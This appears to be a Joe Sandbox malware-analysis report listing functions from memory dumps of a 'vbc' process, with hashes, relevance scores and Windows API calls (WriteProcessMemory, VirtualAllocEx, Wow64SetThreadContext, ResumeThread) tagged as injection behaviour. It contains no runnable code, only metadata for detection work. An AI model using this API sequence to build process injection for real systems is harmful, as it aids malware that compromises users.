Uniqueness Score: -1.00%

Function 0068C5C8 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0068C69B

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9cba30a9f808aad9ea1a5d4b6962b59b3941c9d7f89bf1e7ee93acd8e9032676
Instruction ID: b80c7fad74f5a441463a5d43d1516d2d1c30671a0c4790fd90ab0101934d13f7
Opcode Fuzzy Hash: 9cba30a9f808aad9ea1a5d4b6962b59b3941c9d7f89bf1e7ee93acd8e9032676
Instruction Fuzzy Hash: 574198B5D012589FCF00CFA9D984AEEFBB1BF49314F20942AE815B7240D779AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0068C758 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0068C80A

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 971a663dbf313f286e6d5fcf2e1a06f1658585b85606cbce175bcf550f766933
Instruction ID: bc8284a110e50a39256ef68e9e2f49ed36d23b1b9f0301e982e4ff1b2ceeb0ab
Opcode Fuzzy Hash: 971a663dbf313f286e6d5fcf2e1a06f1658585b85606cbce175bcf550f766933
Instruction Fuzzy Hash: 3241B9B4D042589FCF00CFA9D884AEEFBB1BF49314F10942AE915B7200D775A946CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0068C470 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0068C51A

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f66db5ad74d561a52bf5f288dd0c9f43f324f8b1bede54aff4595bb4d11e54d1
Instruction ID: a7a4ff8b1bd5373ff7db458bfec62fa06d4d89cb9a0360d7e497bdce91f6f87a
Opcode Fuzzy Hash: f66db5ad74d561a52bf5f288dd0c9f43f324f8b1bede54aff4595bb4d11e54d1
Instruction Fuzzy Hash: 5B4199B8D042589BCF10CFA9D884ADEFBB1BF49314F10942AE915B7200D775A916CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0068C280 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0068C32F

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d9ac8958bfffcd51d965212131e8d52abd26ae7378dc0bc3dd507df4888c5f3e
Instruction ID: 27877179f6522d285e23096703baec6898a331b2c32177fb4938ba1de7e37763
Opcode Fuzzy Hash: d9ac8958bfffcd51d965212131e8d52abd26ae7378dc0bc3dd507df4888c5f3e
Instruction Fuzzy Hash: 4741BDB4D012589FCF10CFA9D884AEEFBB1BF49314F14842AE414B7240D779AA46CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0068C160 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0068C1DE

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 43b296a2dd8d477d8eec188b77d58e0ff59f53464ce89d9c6a050a6b79622e1b
Instruction ID: 139d6f0fb53646431e240e0c37d3b49f14f5e1cb10be567783dea8a6f40041cb
Opcode Fuzzy Hash: 43b296a2dd8d477d8eec188b77d58e0ff59f53464ce89d9c6a050a6b79622e1b
Instruction Fuzzy Hash: 2531B9B4D002589FCF10CFA9E884AAEFBB1AF49314F10942AE815B7300D775A906CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D57278 Relevance: 1.4, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 71ffac302337c41821d3011fac5b3777465a8709a2a9305f38fd6c481763e5b9
Instruction ID: 0489c1fa4cf07cf7e7f6e1e305a704c7ba20def445e2c64885c999e05f6d0a28
Opcode Fuzzy Hash: 71ffac302337c41821d3011fac5b3777465a8709a2a9305f38fd6c481763e5b9
Instruction Fuzzy Hash: 78514A74D08228CFDB64DF65D8447E9BBB2AB49301F20C0EAD84DA7251DB745AC9DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D5764A Relevance: 1.4, Strings: 1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: efd631fb2cbdd00905cd57cab840b5fd0a712c2dd5d07004dc318731c9d557c2
Instruction ID: 1c61bc92d3cefede23de7ab4ba504fb216ce5b86f89cbeac9ebc5c17a5f13618
Opcode Fuzzy Hash: efd631fb2cbdd00905cd57cab840b5fd0a712c2dd5d07004dc318731c9d557c2
Instruction Fuzzy Hash: 49510874908228CFDB64DF14D844BE9BBB1EB19312F2080E6D84DA3291D7745AC8DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00D5778B Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 7a5e0d0832d3a47f79192de20a02432593ad1a4befec57e541ab9c8ce986c337
Instruction ID: bbec574d8353b296ffd240402ef30d39001d46b48814a7448634507ab23181ef
Opcode Fuzzy Hash: 7a5e0d0832d3a47f79192de20a02432593ad1a4befec57e541ab9c8ce986c337
Instruction Fuzzy Hash: 6751F474909228CFDB64DF24D8847ECB7B1AB09311F2481EAD94DA7281EB745EC8DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D577F8 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: cb0dbebba24d8ab9eea702ba33c01848833ecd9ab259ef1b424e45f91b7a5ce4
Instruction ID: 42a4c74c8b0d5ee5806191ed7f8c82cab167412e409e35b9babb492a40aa9620
Opcode Fuzzy Hash: cb0dbebba24d8ab9eea702ba33c01848833ecd9ab259ef1b424e45f91b7a5ce4
Instruction Fuzzy Hash: 9D511774904228CFDB64DF28D884BEDB7B1AB09311F2080EAD85DA7251E7745AC8DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00D57684 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 80d8790e6b57fce7b64540938e2e62286647bd470f65bf4c1f5799a9f4dce789
Instruction ID: ee3684d54f516a69174e0d6c3ff78eddd882f5f038890e751489bb736099d9f1
Opcode Fuzzy Hash: 80d8790e6b57fce7b64540938e2e62286647bd470f65bf4c1f5799a9f4dce789
Instruction Fuzzy Hash: 6E510574908228CFDB64DF28D884BE8B7B1EB59311F2081EAD95DA7240D7749EC8DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00D57992 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: f42682d82b0c98e422573d21746a1d5e1d00950e2a59c1b51f04db4f8617fd53
Instruction ID: 89587e8277df691af5657bcd09600eb76caab9add266a838e99bdeee1e0dbc9d
Opcode Fuzzy Hash: f42682d82b0c98e422573d21746a1d5e1d00950e2a59c1b51f04db4f8617fd53
Instruction Fuzzy Hash: 83510774908228CFDB64DF14D884BDCB7B1AB19311F2081E9D95DA7241EB745AC4DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D574F2 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: f0737bac5631e51585b2bd1c8d37c14421d643e66853d7acf07e0a578afa999d
Instruction ID: 1a9946a11c715e47713b4b82bb2460d035a09f044bd07ddb678ce93efd7a59d6
Opcode Fuzzy Hash: f0737bac5631e51585b2bd1c8d37c14421d643e66853d7acf07e0a578afa999d
Instruction Fuzzy Hash: 4D510774908228CFDB64DF14D884BE8B7B1AB19311F2084EAD95DA3290D7749EC8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D57600 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: ff419880a88728545c6f9768f56b10d170f0eee28756b94b1fae922078d0b9d6
Instruction ID: 4ddeca495507efe9e752a80e08e0b614e258db8d94e892970aa1bcbb95a14072
Opcode Fuzzy Hash: ff419880a88728545c6f9768f56b10d170f0eee28756b94b1fae922078d0b9d6
Instruction Fuzzy Hash: 2A514A74908229CFDB64DF14D884BE8B7B1FB19311F2081EAD95DA7291DB749AC8DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00D5750D Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: b80350c6148c77e8796b000a1ea73d6409a6c40db097e20eeacf62981abff398
Instruction ID: 70ef361fed0b090c54bab74a599856c486cb1743ebe759ccdd60bd0e80f8d853
Opcode Fuzzy Hash: b80350c6148c77e8796b000a1ea73d6409a6c40db097e20eeacf62981abff398
Instruction Fuzzy Hash: 8E510674908229CFDB64DF14D884BE9BBB1FB19311F2080EAD95DA3250E7749AC8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D57417 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 13faf6a9840c1feba65ca288e6159918503d62ff95285f441a7ff91bf863ced5
Instruction ID: ed1688abe2a88906abe4450216f9233bc4af250a3729f1b63e4f7138aa845934
Opcode Fuzzy Hash: 13faf6a9840c1feba65ca288e6159918503d62ff95285f441a7ff91bf863ced5
Instruction Fuzzy Hash: E9511774908229CFDB64DF14D884BE8B7B5FB19312F2080E6D95DA7251E7749AC8DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00D574CE Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

), xrefs: 00D574C2

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: bebdec410e72d572c880ca63431186638fb1261e7c53990da66ac3ee84ada56a
Instruction ID: 2acc25df08fc2eced439e5cdbad1303447a13f4debfacacf80fbbf1b06485bc2
Opcode Fuzzy Hash: bebdec410e72d572c880ca63431186638fb1261e7c53990da66ac3ee84ada56a
Instruction Fuzzy Hash: 56511774904229CFDB64DF14D884BE8B7B1EB19311F2080EAD95DA3250E7749EC8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 002EED3E Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

E, xrefs: 002EED47

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 9fa377c2c6b55fb7716dab927a3c01f82f00a9c97d46a0f4a55ca5486bb452db
Instruction ID: c521b52948381e951085669c8ce83e2f5bd1d87cc2b199d4467dc77981e4e59c
Opcode Fuzzy Hash: 9fa377c2c6b55fb7716dab927a3c01f82f00a9c97d46a0f4a55ca5486bb452db
Instruction Fuzzy Hash: BE21F3B4E042998FCF41DFA8C884AEEBBF1BF0A314F6140A9C519EB241E7389945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00D576FE Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

", xrefs: 00D57D88

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 66726dc535759cbb2eb98f385cc8a4be4cc508be64b4b30c7ce8024493a156a3
Instruction ID: 850716f6bcf5e681de31cd4a448c211f22b8cc6f77256e20331ed3a2e37890c0
Opcode Fuzzy Hash: 66726dc535759cbb2eb98f385cc8a4be4cc508be64b4b30c7ce8024493a156a3
Instruction Fuzzy Hash: F6F03034908168CFCF24DF61E8047ECB779AB0A312F1055D5C95A672A1D7745F85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 002EF77F Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027a23b4bb901e6ad0373f25d8278b09524932fbeaf5e8f1bbf3c33e9232ec79
Instruction ID: 93d0a0f2ae2ea0de2740b4504c3b42b47f9d8a9c692422a9f8dcbca59e4f187f
Opcode Fuzzy Hash: 027a23b4bb901e6ad0373f25d8278b09524932fbeaf5e8f1bbf3c33e9232ec79
Instruction Fuzzy Hash: 8261F674D542688FDF90DFA9C980BDDBBB2BB48314FA481A9D50DA7201EB319991CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E01F4 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 084e15352df6d713a3e9ad033b28781e64ff5743baf2597eb2a158d0f6e29e74
Instruction ID: e0f253e836984cbd8dc2ec36fb9ec61bb3421f67d4653fc72449aa5e9b543aa4
Opcode Fuzzy Hash: 084e15352df6d713a3e9ad033b28781e64ff5743baf2597eb2a158d0f6e29e74
Instruction Fuzzy Hash: DC516630E102599FCB04EFA4C895AEEB7B2FF88304F118429E915773A5DB346D52CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 002EEEB0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f187d932314b160e9958fe4463e42db7e2dd17918a2cb7288b529e77e3b2bdb5
Instruction ID: 4f134fce15f30d77e05061b77e9b79249b94b84ad71fdf51e7d508c709f525b6
Opcode Fuzzy Hash: f187d932314b160e9958fe4463e42db7e2dd17918a2cb7288b529e77e3b2bdb5
Instruction Fuzzy Hash: 3C51BEB4E15259DFCF50CFA9D984ADDBBF1BB49300F20902AE819AB315E770A951CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002EEEC0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec14060e991ade643601e7eac7c3535adcf1e6f4b22d75381339ea6a8436eef1
Instruction ID: 9139ceaedb4f60689e6a75fc0bca5736d6b0b88e258a0f2f89b189269ec635e3
Opcode Fuzzy Hash: ec14060e991ade643601e7eac7c3535adcf1e6f4b22d75381339ea6a8436eef1
Instruction Fuzzy Hash: 7E51AEB4E15259DFCF50CFA9D980ADDBBF1BB49300F20902AE819AB315E770A951DF60

Uniqueness

Uniqueness Score: -1.00%

Function 002ED9C8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd53d09b7ae06877444c783388ea4f58a00ec81386bc6707b9918a4f79dd7425
Instruction ID: f36ed057675d37a91d1d999ccad3b1508af69f450692a6084cdc1b360190e172
Opcode Fuzzy Hash: cd53d09b7ae06877444c783388ea4f58a00ec81386bc6707b9918a4f79dd7425
Instruction Fuzzy Hash: 2A312474D04249DFCB04CFA6D848AEDBBB2BF89304F10806AD919B73A1DB345A55CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D563E8 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629658465dee3e40085f0f8bb8510be8b97410925fbec56d824214d12cb9f869
Instruction ID: ad2cb5ecdfd5c16ae900c5c7708eb7235ef41e34cc6b4425b19256ed8e319483
Opcode Fuzzy Hash: 629658465dee3e40085f0f8bb8510be8b97410925fbec56d824214d12cb9f869
Instruction Fuzzy Hash: DE310474E002589FCB05DFA8D940AEEBBB2FF89304F10802AD915B7365EB345A15CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002EEC86 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3b43459e28cd55b4f08177c4df70e5981155c5191cdb0f7299b001af4a4c50
Instruction ID: 7b24fd42708d7835b0b4ab0761eb94fbb59f96c2a063edff285d904bb978e0a1
Opcode Fuzzy Hash: fe3b43459e28cd55b4f08177c4df70e5981155c5191cdb0f7299b001af4a4c50
Instruction Fuzzy Hash: B931D274E6029ACFCF04CFEAC8405EEBBF5AB49311F61942AD409EB304E7719950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00D50088 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7c381d9e10d5f41a57c5357454fe82887e1c9fae273ee6e831980fcb8ec122
Instruction ID: fd7894ef8f4a57ee50d33676e5743f0ccb77e021e6d806dc6176b8214eebe576
Opcode Fuzzy Hash: 9b7c381d9e10d5f41a57c5357454fe82887e1c9fae273ee6e831980fcb8ec122
Instruction Fuzzy Hash: F8310474E042189BCF04DFA9D845AEEBBB6EF89301F10842AE919B7391DB345945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992c20b0e9a702c138374c38f52a5dc81e3518122e92794abd87f3faefd74640
Instruction ID: 3f050534a542595480d5991d9f921f07eb1f273b73824ae8b1913471ad865ce1
Opcode Fuzzy Hash: 992c20b0e9a702c138374c38f52a5dc81e3518122e92794abd87f3faefd74640
Instruction Fuzzy Hash: AE21D075618244EFDB01DF14D980B2ABBB1FF88314F24C6A9ED095B247C376D816CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0027D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff03a3603da3eb2308d73c630dae57eb6231c8436cac8eec31101518be0a04a
Instruction ID: 69c127aa5d52c0d226c4741205ddeddb57137159cb5a124637e3e9cbb5e0128e
Opcode Fuzzy Hash: aff03a3603da3eb2308d73c630dae57eb6231c8436cac8eec31101518be0a04a
Instruction Fuzzy Hash: 2C21F275618244DFCB14DF24D984B2ABB71EF88314F24C6A9E90D4B246C37BD826CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002EEAFE Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53802bd24d762a7795c4f5f867b866aa6b3b95d7ebd28fa9a5039cda593f3132
Instruction ID: ae93bf8905c6c62153880a8d3ed05afa65ee9d1c84f24b7ed448a2bd0fd70015
Opcode Fuzzy Hash: 53802bd24d762a7795c4f5f867b866aa6b3b95d7ebd28fa9a5039cda593f3132
Instruction Fuzzy Hash: 0C21BF74A10258CFCB64DFB9D884A9DBBB1BF49315F6184AAD50AE7321DB319C81CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00D50238 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f0e8a4006478be028eb5dc142373b793e89704bf4801314982ba6e0558275b
Instruction ID: 1b0e3c095350d875433a14466ea86201c6fd27e3aa4e88a53e89e250f54e9029
Opcode Fuzzy Hash: e7f0e8a4006478be028eb5dc142373b793e89704bf4801314982ba6e0558275b
Instruction Fuzzy Hash: 56213670D04209CFCF14DFA9C4496AEBBB1BB48306F24C16ACD08A7342DB349985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0027D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5fdd61cc78fa8b0271b15ee988ff135bbcafa15b7f311d81ffe14a96fa7acde
Instruction ID: 855fca0aa41117dab70bfce320838195643b1484c0957c5fa64b67569e2305d0
Opcode Fuzzy Hash: b5fdd61cc78fa8b0271b15ee988ff135bbcafa15b7f311d81ffe14a96fa7acde
Instruction Fuzzy Hash: B8215B755093C08FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A981ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D501D9 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157cd3ebcd93d1913a994f049397d6b5a121d6ca59bffe0dde08df82de2f41ba
Instruction ID: 0e9f1eabeae220c0ec0aaec9e4ac546a5fa4c9d666618da8daa02053944378de
Opcode Fuzzy Hash: 157cd3ebcd93d1913a994f049397d6b5a121d6ca59bffe0dde08df82de2f41ba
Instruction Fuzzy Hash: A9116D74D082489FCB01CFA8D89569DBFB0AB45315F24C1AAD848E3302D7319985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002E0671 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f72f576be6e6b71a5185ef2e2c2bb27f3d101ff1930df668a9a866a541ce139
Instruction ID: f6044cc63deb6a77aeeb53f08a5daa610962133ae35ac11a5ec7d8f9d4d9b8f3
Opcode Fuzzy Hash: 5f72f576be6e6b71a5185ef2e2c2bb27f3d101ff1930df668a9a866a541ce139
Instruction Fuzzy Hash: 8B11B274E002199FCB00CFA8D485ADEBBB1EB48301F1185AAD914A7351D731AE55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0027D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da50a5e5ca0ffb5633ccb237e622e82761356e0ffc5c016c5ff7c56a27bafb7
